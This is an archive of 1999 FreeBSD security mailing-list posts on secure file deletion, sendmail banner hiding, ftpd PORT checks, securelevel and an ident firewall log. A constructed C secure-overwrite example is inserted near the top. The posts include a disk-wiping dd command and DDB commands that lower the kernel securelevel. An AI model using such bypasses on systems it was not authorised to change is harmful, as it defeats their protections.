> If all you want is a way to force a file to go away from the command line,
> just rewrite rm.

From my understanding of ffs, this would not be sufficient. As a file grows, it is possible that the data is copied from its initial location to a new one. To not just give a false sense of security, these block fragments would have to be overwritten after the data is copied, or some of the data could still be sitting on the drive after you think it is gone.

Tim.
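The in-place overwrite approach the thread keeps coming back to (an inverting pass, alternating bit patterns, a random pass from /dev/urandom, then unlink) as an added, constructed illustration; it is not FreeBSD's rm -P nor any poster's program, and shred_file, pass_invert and the pattern list are this example's own names. The comments record the limitation Tim describes: rewriting a file in place only touches the blocks it occupies now, not fragments it outgrew earlier, temporary copies or swap.

```c
/* Added example: multi-pass in-place overwrite of one regular file.
 * Not rm -P and not the program discussed in the thread. */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define BUFSZ 4096

/* Fill the whole file with one byte value, then force it to the platter
 * so the next pass does not just replace it in the buffer cache. */
static int pass_fill(int fd, off_t len, unsigned char value)
{
    unsigned char buf[BUFSZ];
    memset(buf, value, sizeof buf);
    if (lseek(fd, 0, SEEK_SET) < 0) return -1;
    for (off_t done = 0; done < len; ) {
        size_t n = (len - done > (off_t)sizeof buf) ? sizeof buf : (size_t)(len - done);
        ssize_t w = write(fd, buf, n);
        if (w <= 0) return -1;
        done += w;
    }
    return fsync(fd);
}

/* First pass: write back the bitwise complement of the existing data,
 * flipping every bit the original left on the media. */
static int pass_invert(int fd, off_t len)
{
    unsigned char buf[BUFSZ];
    for (off_t pos = 0; pos < len; ) {
        ssize_t r = pread(fd, buf, sizeof buf, pos);
        if (r <= 0) return -1;
        for (ssize_t i = 0; i < r; i++) buf[i] = (unsigned char)~buf[i];
        if (pwrite(fd, buf, (size_t)r, pos) != r) return -1;
        pos += r;
    }
    return fsync(fd);
}

/* Final pass: random bytes from /dev/urandom. */
static int pass_random(int fd, off_t len)
{
    unsigned char buf[BUFSZ];
    int rnd = open("/dev/urandom", O_RDONLY);
    if (rnd < 0) return -1;
    if (lseek(fd, 0, SEEK_SET) < 0) { close(rnd); return -1; }
    for (off_t done = 0; done < len; ) {
        size_t n = (len - done > (off_t)sizeof buf) ? sizeof buf : (size_t)(len - done);
        if (read(rnd, buf, n) != (ssize_t)n) { close(rnd); return -1; }
        if (write(fd, buf, n) != (ssize_t)n) { close(rnd); return -1; }
        done += n;
    }
    close(rnd);
    return fsync(fd);
}

/* Run all passes over the blocks the file currently occupies, then unlink.
 * Returns the number of passes completed, or -1 on error.
 * Limitations (as raised in the thread): fragments ffs relocated while the
 * file grew, editor temp files and swap are NOT reached by this. */
int shred_file(const char *path)
{
    static const unsigned char patterns[] = { 0x55, 0xAA, 0x00, 0xFF };
    struct stat st;
    int passes = 0;
    int fd = open(path, O_RDWR);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode)) { close(fd); return -1; }
    if (pass_invert(fd, st.st_size) < 0) { close(fd); return -1; }
    passes++;
    for (size_t i = 0; i < sizeof patterns; i++) {   /* complementary pairs */
        if (pass_fill(fd, st.st_size, patterns[i]) < 0) { close(fd); return -1; }
        passes++;
    }
    if (pass_random(fd, st.st_size) < 0) { close(fd); return -1; }
    passes++;
    close(fd);
    return unlink(path) == 0 ? passes : -1;
}

/* Self-check on a constructed temp file: the inverting pass must yield the
 * complement of the sample, and the file must be gone afterwards. Returns 1. */
int shred_selftest(void)
{
    static const char sample[] = "constructed sample: nothing secret here";
    const size_t n = sizeof sample - 1;
    unsigned char back[64];
    char path[] = "/tmp/shredXXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return 0;
    if (write(fd, sample, n) != (ssize_t)n) { close(fd); unlink(path); return 0; }
    if (pass_invert(fd, (off_t)n) < 0) { close(fd); unlink(path); return 0; }
    if (pread(fd, back, n, 0) != (ssize_t)n) { close(fd); unlink(path); return 0; }
    for (size_t i = 0; i < n; i++)
        if (back[i] != (unsigned char)~sample[i]) { close(fd); unlink(path); return 0; }
    close(fd);
    return shred_file(path) == 6 && access(path, F_OK) != 0;
}
```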
From owner-freebsd-security Thu May 20 14:33:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 5272214C8D for ; Thu, 20 May 1999 14:33:29 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr)
Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id XAA23462 for freebsd-security@freebsd.org; Thu, 20 May 1999 23:33:26 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr)
Received: by keltia.freenix.fr (Postfix, from userid 101) id EE24F8837; Thu, 20 May 1999 19:36:21 +0200 (CEST) (envelope-from roberto)
Date: Thu, 20 May 1999 19:36:21 +0200
From: Ollivier Robert
To: freebsd-security@freebsd.org
Subject: Re: Sendmail HELP confuse me
Message-ID: <19990520193621.A40838@keltia.freenix.fr>
Mail-Followup-To: freebsd-security@freebsd.org
References: <374409C2.D1E63188@sentry.granch.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
User-Agent: Mutt/0.95.5i
In-Reply-To: <374409C2.D1E63188@sentry.granch.ru>; from Rashid N. Achilov on Thu, May 20, 1999 at 08:10:26PM +0700
X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5322 AMD-K6 MMX @ 200 MHz
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to Rashid N. Achilov:
> How can I remove the version number from the message displayed by the HELP
> command in a telnet session on the sendmail port? The greeting can be
> customized in sendmail.cf, but I cannot find HELP there, or in sendmail.hf either.

Hack the source to mask $v or modify the .hf file.

Or use Postfix, which has the complete greeting configurable (and defaults to no version number). It has no HELP command yet, so there is no hole there :-)

--
Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #71: Sun May 9 20:16:32 CEST 1999

From owner-freebsd-security Thu May 20 15:44:40 1999
Delivered-To: freebsd-security@freebsd.org
Received: from alpha.sea-to-sky.net (sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (Postfix) with ESMTP id C6BAA14E37 for ; Thu, 20 May 1999 15:44:24 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net)
Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.9.1a/8.8.7) id PAA01561; Thu, 20 May 1999 15:44:42 -0700
Date: Thu, 20 May 1999 15:44:42 -0700 (PDT)
From: Steve Reid
To: freebsd-security@freebsd.org
Subject: re: secure deletion
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Regarding the secure deletion thread...

rm in FreeBSD (*BSD, I think) already has a -P option to overwrite files. "man 1 rm" for more info.

If you want to overwrite the empty space on your disk, to wipe files that have already been rm'ed, something like this is 98% effective:

    dd if=/dev/urandom of=foobar & (sleep 1; rm foobar)

The rm is supposed to happen before dd exits so that when dd finally bombs on a "disk full" error the space will automatically be freed. It isn't perfect, as partially used blocks won't have the unused portion overwritten, but most of the disk will be wiped.

Overwriting once is sufficient to prevent casual snooping. Using the rm and dd commands above would allow you to safely give your disk to a nosy friend, but is probably not enough to protect your deleted files from the FBI, the mafia, or corporate competitors. If you're creating a new secure deletion program or kernel patch and want to do more than just a single overwrite you should read this paper:

http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html

P.S. Don't forget swap space.

From owner-freebsd-security Thu May 20 15:46:25 1999
Delivered-To: freebsd-security@freebsd.org
Received: from pollux.or.signature.nl (pollux.or.signature.nl [194.229.138.194]) by hub.freebsd.org (Postfix) with ESMTP id 9F6BA1589C for ; Thu, 20 May 1999 15:46:10 -0700 (PDT) (envelope-from bit@signature.nl)
Received: from localhost (bit@localhost) by pollux.or.signature.nl (8.9.1/8.9.1) with SMTP id AAA13696; Fri, 21 May 1999 00:45:56 +0200 (MET DST)
Date: Fri, 21 May 1999 00:45:56 +0200 (MET DST)
From: Bart Smit
X-Sender: bit@pollux.or.signature.nl
To: Kiril Mitev
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
In-Reply-To: <199905201542.QAA25977@idea.co.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 20 May 1999, Kiril Mitev wrote:

> -> then you (theoretically) should be worried about locking up your
> hardware, rather than wiping your disk :-0

Actually it's easier and a lot safer to wipe your disk. It's perfectly feasible that the law shows up on your doorstep and insists on taking your hardware if you're an ISP. It takes as little as some determination from a pseudo-religious sect's lawyers (ask xs4all.nl).

--
Bart

From owner-freebsd-security Thu May 20 16:37:54 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E8A3C14E6C for ; Thu, 20 May 1999 16:37:50 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id RAA66983; Thu, 20 May 1999 17:36:40 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA08650; Thu, 20 May 1999 17:36:43 -0600 (MDT)
Message-Id: <199905202336.RAA08650@harmony.village.org>
To: Joel Maslak
Subject: Re: Secure Deletion
Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 20 May 1999 09:55:07 MDT." <3.0.6.32.19990520095507.00840010@india.wind-river.com>
References: <3.0.6.32.19990520095507.00840010@india.wind-river.com>
Date: Thu, 20 May 1999 17:36:43 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <3.0.6.32.19990520095507.00840010@india.wind-river.com> Joel Maslak writes:
: As for "secure" deletion... Why doesn't someone just write a simple
: user-space program to do that.

Because that wouldn't work.

: If all you want is a way to force a file to go away from the command line,
: just rewrite rm.

Because that doesn't work for temporary files.

Warner

From owner-freebsd-security Thu May 20 18:23:24 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ptah.ricochet.net (mg-206191146-151.ricochet.net [206.191.146.151]) by hub.freebsd.org (Postfix) with ESMTP id 976A6158D8 for ; Thu, 20 May 1999 18:23:16 -0700 (PDT) (envelope-from elakin@ricochet.net)
Received: (from elakin@localhost) by ptah.ricochet.net (8.9.3/8.9.2) id SAA32989; Thu, 20 May 1999 18:21:45 -0700 (PDT) (envelope-from elakin)
Date: Thu, 20 May 1999 18:21:42 -0700
From: Eric Lakin
To: Avalon Books
Cc: security@FreeBSD.ORG
Subject: Re: Secure Deletion
Message-ID: <19990520182142.A1242@ptah.ricochet.net>
Reply-To: elakin@ricochet.net
References: <3.0.6.32.19990520095507.00840010@india.wind-river.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: ; from Avalon Books on Thu, May 20, 1999 at 03:05:18PM -0500
X-Disclaimer: Yow!
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, May 20, 1999 at 03:05:18PM -0500, Avalon Books spread the following propaganda:
>
> > As for "secure" deletion... Why doesn't someone just write a simple
> > user-space program to do that. True, it wouldn't handle calls to unlink(),
> > but one would think that someone could modify the library really quick
> > (provided no one does a system call directly, but uses the libc interface
> > instead). I think this would be much better for everyone involved.
>
> Actually, I've done this already. At the moment, it's a simple
> stand-alone program (I originally wrote it during my DOS days, years ago),
> but I've been toying with the idea of adding the method in as an option
> for 'rm'. No need to tie up the kernel with this sort of thing.
>
> It uses a combination of randomly-generated and pattern-specific
> overwrites of a file (or group of files) in-place, in order to make
> recovery extremely difficult--even with advanced equipment (like
> echo-cancellation analysis systems). A standard file-deletion is issued
> after it's done mangling the file(s) in question. It works ok, I guess, as
> betas go.

This sounds similar to "rm -P" in a stock FreeBSD system (3.1, at least).

From owner-freebsd-security Thu May 20 18:44:47 1999
Delivered-To: freebsd-security@freebsd.org
Received: from vespucci.advicom.net (vespucci.advicom.net [199.170.120.42]) by hub.freebsd.org (Postfix) with ESMTP id 2344A158FD for ; Thu, 20 May 1999 18:44:40 -0700 (PDT) (envelope-from avalon@vespucci.advicom.net)
Received: from localhost (avalon@localhost) by vespucci.advicom.net (8.8.8/8.8.5) with ESMTP id UAA09506; Thu, 20 May 1999 20:44:38 -0500 (CDT)
X-Envelope-Recipient: security@FreeBSD.ORG
Date: Thu, 20 May 1999 20:44:37 -0500 (CDT)
From: Avalon Books
To: Eric Lakin
Cc: security@FreeBSD.ORG
Subject: Re: Secure Deletion
In-Reply-To: <19990520182142.A1242@ptah.ricochet.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > It uses a combination of randomly-generated and pattern-specific
> > overwrites of a file (or group of files) in-place, in order to make
> > recovery extremely difficult--even with advanced equipment (like
> > echo-cancellation analysis systems). A standard file-deletion is issued
> > after it's done mangling the file(s) in question. It works ok, I guess, as
> > betas go.
>
> This sounds similar to "rm -P" in a stock FreeBSD system (3.1, at least).

Similar, but certainly more sophisticated than the -P option for rm. Still, my program is just a beta, and I'll admit that it certainly isn't ready for any kind of real-world environment--yet. I'm going to add swap-space and free-space deletion options as soon as I figure out a way to do those things gracefully. It should make for a nice, relaxing programming project.

--R. Pelletier
Sys Admin, House Galiagante
We are a Micro$oft-free site

From owner-freebsd-security Thu May 20 19:05:01 1999
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.inreach.com (unknown [209.142.0.6]) by hub.freebsd.org (Postfix) with ESMTP id 40FC814D97 for ; Thu, 20 May 1999 19:04:59 -0700 (PDT) (envelope-from condor@inreach.com)
Received: from pavilion (209-142-8-234.stk.inreach.net [209.142.8.234]) by smtp.inreach.com (8.9.3/8.9.3) with SMTP id SAA21556; Thu, 20 May 1999 18:52:16 -0700 (PDT)
Received: by localhost with Microsoft MAPI; Thu, 20 May 1999 19:04:15 -0700
Message-ID: <01BEA2F3.8E3149A0.condor@inreach.com>
From: CONDOR
Reply-To: "condor@inreach.com"
To: "'Avalon Books'", Dan Langille
Cc: Darren Reed, "freebsd-security@FreeBSD.ORG"
Subject: RE: secure deletion
Date: Thu, 20 May 1999 18:51:19 -0700
Organization: Condor Worldwide Data Systems
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----Original Message-----
From: Avalon Books [SMTP:avalon@advicom.net]
Sent: Thursday, May 20, 1999 12:52
To: Dan Langille
Cc: Darren Reed; freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion

It seems a bit extreme, but I will admit it *is* a secure erase method. That's military thinking for you...

[CONDOR] I saw a good 'government approved CD eraser' at a convention one time. -A guy had two heat warped CDs in a toaster.. :-)

From owner-freebsd-security Thu May 20 21:35:58 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id ABF0615926 for ; Thu, 20 May 1999 21:35:56 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id WAA03309; Thu, 20 May 1999 22:35:47 -0600 (MDT)
Message-Id: <4.2.0.37.19990520223517.0468a650@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Thu, 20 May 1999 22:35:38 -0600
To: "Addr.com Web Hosting", freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: question about ftpd security feature.
In-Reply-To: <4.2.0.37.19990520104919.02a14ee0@mail.addr.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Doesn't your proxy munge the PORT command?

--Brett

At 11:04 AM 5/20/99 -0700, Addr.com Web Hosting wrote:
>Hi,
>
>I have a question regarding a security feature which is built into the "ftpd" on the FreeBSD system. The feature is that the server will not accept any "PORT" command unless the address matches that of the client. The reason this is a problem is because I am partially proxy-ing the connection, and the client address is that of the proxy, but I don't want the proxy to handle data connections, just have them made directly to the client.
>
>In more detail (and I would appreciate any comments/suggestions about this scheme or any alternate scheme you can recommend):
>
>We have users distributed among several machines; however, we would like for the users to be able to access their account via a single FTP server. We are currently using NFS; however, under heavier loads it becomes unmanageable and unstable. Instead, I have developed a very simple proxy, which queries for the user name and then, based on an internal table, makes the connection to the correct server, and simply pipes any data from the server to the client, and vice versa. This is where I hit the problem that the server will not establish a data connection to any machine other than the proxy. Of course I can proxy the data connection as well, but if it doesn't cause any security issues, I would much rather just comment that line out of the ftpd server.
>
>Thanks in advance,
>Anthony

From owner-freebsd-security Thu May 20 23:35:19 1999
Delivered-To: freebsd-security@freebsd.org
Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id 2AF3E15920 for ; Thu, 20 May 1999 23:35:12 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au)
Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id QAA10497 for security@freebsd.org; Fri, 21 May 1999 16:35:11 +1000 (EST) (envelope-from wkt)
From: Warren Toomey
Message-Id: <199905210635.QAA10497@henry.cs.adfa.edu.au>
Subject: Lowering securelevel from console?
To: security@freebsd.org
Date: Fri, 21 May 1999 16:35:11 +1000 (EST)
Reply-To: wkt@cs.adfa.edu.au
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi all,

I'm sure this has been discussed before; I've hit the list browse web engine with no good results, so...

I think that being able to lower the securelevel as root from the console would be a good idea, rather than having to go to single-user mode to make changes as required.

I know the current code in kern_mib.c doesn't do this. I'm expecting comments back saying that it's not a good idea, you're still net connected. Assume I've ifconfig'd all interfaces down :-)

Now, are there any other reasons why lowering securelevel as root from the console (and no net connectivity) would be a BAD thing?

Many thanks in advance for critical and informative replies!

Warren

From owner-freebsd-security Thu May 20 23:35:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 0D4E214E78 for ; Thu, 20 May 1999 23:35:17 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id XAA17266; Thu, 20 May 1999 23:34:39 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id XAA22650; Thu, 20 May 1999 23:34:39 -0700
Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA03117; Thu, 20 May 99 23:34:30 PDT
Message-Id: <3744FE75.E83FA611@softweyr.com>
Date: Fri, 21 May 1999 00:34:29 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: junkmale@xtra.co.nz
Cc: Darren Reed, freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
References: <37438E4C.4B95B937@softweyr.com> from Wes Peters at "May 19, 99 10:23:40 pm" <19990520065202.IDMD7869945.mta1-rme@wocker>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dan Langille wrote:
>
> On 20 May 99, at 16:42, Darren Reed wrote:
>
> > I'd worry about this sort of thing when and if FreeBSD is ever used for
> > storing of (officially) classified/confidential material and even then,
> > the solution is likely to be to take a hammer or drill to the disks.
>
> I know of at least one government department which drills through the
> platters when disposing of a disk drive.

None of the above would have met those specifications, just in case you're wondering. All platters had to be destroyed in an 800 degree F oven for at least an hour, or ground into small particles. ;^)

But then again, we were storing relatively important information on those disks. For relatively mundane security needs, overwriting with one pass of 0xa3 (10100101) followed by one pass of 0x3a (01011010) would certainly suffice.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
http://www.softweyr.com/~softweyr wes@softweyr.com

From owner-freebsd-security Thu May 20 23:42:13 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 4D74514A2E for ; Thu, 20 May 1999 23:42:10 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id XAA17406; Thu, 20 May 1999 23:42:05 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id XAA22806; Thu, 20 May 1999 23:42:05 -0700
Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA03472; Thu, 20 May 99 23:42:02 PDT
Message-Id: <3745003A.874424CD@softweyr.com>
Date: Fri, 21 May 1999 00:42:02 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: secure deletion
References: <199905201013.UAA12994@avalon.reed.wattle.id.au>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Darren Reed wrote:
>
> So properly in this case means using memset rather than bzero and a
> variable number of passes, correct (with perhaps a programmable pattern)?
> Being able to verify that the file's contents get nuked to the value the
> pass is meant to have set it to might be worthwhile.
>
> After the first pass, I'm not sure that there is any meaningful addition
> to the security of the erased data.

You're wrong here.

> Access to sophisticated machinery is required to circumvent it,

And anyone with $100 has access to that machinery -- disk recovery houses. In some cases, you can read it from an ordinary controller; overwriting disk blocks with zeros often doesn't erase the one bits enough to keep the head from reading back the same ones you were trying to overwrite.

> but if that is what you're trying to protect
> against then why fool yourself by deploying a level of security that is
> known to be less than that of Government bodies who physically destroy disks.
>
> I don't think you understand the problem properly if you think it can be
> coded "correctly" - what you're proposing just isn't possible via software
> where one overwrite is pretty much as good as multiple.

But one overwrite isn't anywhere near as good as multiples, especially if you pay a little attention to how disk drives actually record data. The real key is to rotate the individual bits between 1 and 0 multiple times so you are erasing deeply into the recording media and not leaving "generations" of data on the platter.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
http://www.softweyr.com/~softweyr wes@softweyr.com

From owner-freebsd-security Thu May 20 23:47:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 4060814A2E for ; Thu, 20 May 1999 23:47:27 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id XAA17414; Thu, 20 May 1999 23:46:50 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id XAA22981; Thu, 20 May 1999 23:46:50 -0700
Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA03739; Thu, 20 May 99 23:46:47 PDT
Message-Id: <37450157.181A953@softweyr.com>
Date: Fri, 21 May 1999 00:46:47 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: Joel Maslak
Cc: security@FreeBSD.ORG
Subject: Re: Secure Deletion
References: <3.0.6.32.19990520095507.00840010@india.wind-river.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Joel Maslak wrote:
>
> Let's keep standard BSD semantics here, please!
>
> As for "secure" deletion... Why doesn't someone just write a simple
> user-space program to do that. True, it wouldn't handle calls to unlink(),
> but one would think that someone could modify the library really quick
> (provided no one does a system call directly, but uses the libc interface
> instead). I think this would be much better for everyone involved.

It'd be ever so much easier to do it with a MIB (kern.shred) or a filesystem superblock or mount-time option for somewhat finer control. In general, if you're worried enough about files to obliterate them on deletion, you want to do so to every file, so a MIB makes sense.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
http://www.softweyr.com/~softweyr wes@softweyr.com

From owner-freebsd-security Fri May 21 00:16:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (Postfix) with ESMTP id E13B01586F for ; Fri, 21 May 1999 00:16:55 -0700 (PDT) (envelope-from dima@burka.rdy.com)
Received: (from dima@localhost) by burka.rdy.com (8.9.3/RDY&DVV) id AAA20092; Fri, 21 May 1999 00:16:47 -0700 (PDT)
Message-Id: <199905210716.AAA20092@burka.rdy.com>
Subject: Re: Lowering securelevel from console?
In-Reply-To: <199905210635.QAA10497@henry.cs.adfa.edu.au> from Warren Toomey at "May 21, 1999 04:35:11 pm"
To: wkt@cs.adfa.edu.au
Date: Fri, 21 May 1999 00:16:47 -0700 (PDT)
Cc: security@FreeBSD.ORG
X-Class: Fast
Organization: HackerDome
Reply-To: dima@best.net
From: dima@best.net (Dima Ruban)
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Warren Toomey writes:
> Hi all,
> I'm sure this has been discussed before, I've hit the list browse
> web engine with no good results, so...
>
> I think that being able to lower the securelevel as root from the console
> would be a good idea, rather than having to go to single-user mode to make
> changes as required.
>
> I know the current code in kern_mib.c doesn't do this. I'm expecting
> comments back saying that it's not a good idea, you're still net connected.
> Assume I've ifconfig'd all interfaces down :-)
>
> Now, are there any other reasons why lowering securelevel as root from
> the console (and no net connectivity) would be a BAD thing?
>
> Many thanks in advance for critical and informative replies!

Use DDB. Something like this should work:

    db> w securelevel 0xffffffff
    db> cont

Enabling securelevel changes from the console w/o breaking into the debugger is potentially dangerous.

> Warren

--
dima

From owner-freebsd-security Fri May 21 01:32:01 1999
Delivered-To: freebsd-security@freebsd.org
Received: from amanda.qmpgmc.ac.uk (amanda.qmpgmc.ac.uk [194.81.5.1]) by hub.freebsd.org (Postfix) with ESMTP id 3345F151F1 for ; Fri, 21 May 1999 01:31:53 -0700 (PDT) (envelope-from greg@qmpgmc.ac.uk)
Received: from greg (gquinlan [194.81.0.56]) by amanda.qmpgmc.ac.uk (8.9.3/8.9.3) with SMTP id JAA01079 for ; Fri, 21 May 1999 09:31:52 +0100 (BST)
Message-ID: <001f01bea364$57d9c820$380051c2@greg.qmpgmc.ac.uk>
Reply-To: "Greg Quinlan"
From: "Greg Quinlan"
To:
Subject: Server trying to connect to Port 113
Date: Fri, 21 May 1999 09:31:37 +0100
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I am not on the mailing list so please include me in your reply.

Can someone explain what this remote system is trying to do?

    May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 :113 in via fxp1
    May 21 09:22:35 amanda last message repeated 3 times

Extract from /etc/services

    auth 113/tcp ident tap #Authentication Service
    auth 113/udp ident tap #Authentication Service

Greg

-----Original Message-----
From: Andrew McNaughton
To: junkmale@xtra.co.nz
Cc: freebsd-security@FreeBSD.ORG
Date: 18 May 1999 23:34
Subject: Re: http attack(?)

>> A few days ago, I noticed my machine was running extremely slowly. I did a top 10 at the console and
>> got "too many open files". Existing telnet sessions were non-responsive. New telnets would not start.
>>
>> I then tried a top 5. named and syslogd were busy.
>>
>> I looked at httpd.error and 21 of these spread over 14 seconds:
>> [Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system
>
>I'm not too sure whether to trust that the restriction on file handles is system wide. Some programs may not know about FreeBSD's process limits scheme.
>
>Check the output of 'limits' and 'sysctl -a | grep maxfiles'. They might give you a better idea what is happening. The context in which you run limits is important, but if your shell is failing, then that shell is probably a good thing to have a look at. limits is a shell built-in under sh and bash, and will not spawn a new process.
>
>Andrew McNaughton
>--
>-----------
>Andrew McNaughton
>andrew@squiz.co.nz
